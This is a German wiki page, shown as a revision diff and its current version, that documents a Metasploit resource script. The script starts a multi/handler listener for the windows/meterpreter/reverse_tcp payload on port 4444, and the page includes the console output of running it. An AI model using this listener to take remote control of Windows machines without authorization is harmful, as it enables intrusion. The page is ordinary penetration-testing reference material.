Metasploit script: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(Die Seite wurde neu angelegt: „=Erstellen eines Skriptes= *vi reverse_shell-windows.rc use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT…“) |
|||
| Zeile 8: | Zeile 8: | ||
=Ausführen= | =Ausführen= | ||
*msfconsole -r reverse_shell-windows.rc | *msfconsole -r reverse_shell-windows.rc | ||
| + | <pre> | ||
| + | |||
| + | ______________________________________ | ||
| + | / it looks like you're trying to run a \ | ||
| + | \ module / | ||
| + | -------------------------------------- | ||
| + | \ | ||
| + | \ | ||
| + | __ | ||
| + | / \ | ||
| + | | | | ||
| + | @ @ | ||
| + | | | | ||
| + | || |/ | ||
| + | || || | ||
| + | |\_/| | ||
| + | \___/ | ||
| + | |||
| + | |||
| + | =[ metasploit v6.2.3-dev ] | ||
| + | + -- --=[ 2227 exploits - 1169 auxiliary - 398 post ] | ||
| + | + -- --=[ 867 payloads - 45 encoders - 11 nops ] | ||
| + | + -- --=[ 9 evasion ] | ||
| + | |||
| + | Metasploit tip: Enable HTTP request and response logging | ||
| + | with set HttpTrace true | ||
| + | |||
| + | [*] Processing reverse_shell-windows.rc for ERB directives. | ||
| + | resource (reverse_shell-windows.rc)> use exploit/multi/handler | ||
| + | [*] Using configured payload generic/shell_reverse_tcp | ||
| + | resource (reverse_shell-windows.rc)> set PAYLOAD windows/meterpreter/reverse_tcp | ||
| + | PAYLOAD => windows/meterpreter/reverse_tcp | ||
| + | resource (reverse_shell-windows.rc)> set LHOST 0.0.0.0 | ||
| + | LHOST => 0.0.0.0 | ||
| + | resource (reverse_shell-windows.rc)> set LPORT 4444 | ||
| + | LPORT => 4444 | ||
| + | resource (reverse_shell-windows.rc)> exploit -j -z | ||
| + | [*] Exploit running as background job 0. | ||
| + | [*] Exploit completed, but no session was created. | ||
| + | |||
| + | [*] Started reverse TCP handler on 0.0.0.0:4444 | ||
| + | msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit | ||
| + | msf6 exploit(multi/handler) > | ||
| + | </pre> | ||
Aktuelle Version vom 14. Oktober 2022, 12:53 Uhr
Erstellen eines Skriptes
- vi reverse_shell-windows.rc
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 exploit -j -z
Ausführen
- msfconsole -r reverse_shell-windows.rc
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.2.3-dev ]
+ -- --=[ 2227 exploits - 1169 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true
[*] Processing reverse_shell-windows.rc for ERB directives.
resource (reverse_shell-windows.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (reverse_shell-windows.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_shell-windows.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reverse_shell-windows.rc)> set LPORT 4444
LPORT => 4444
resource (reverse_shell-windows.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) >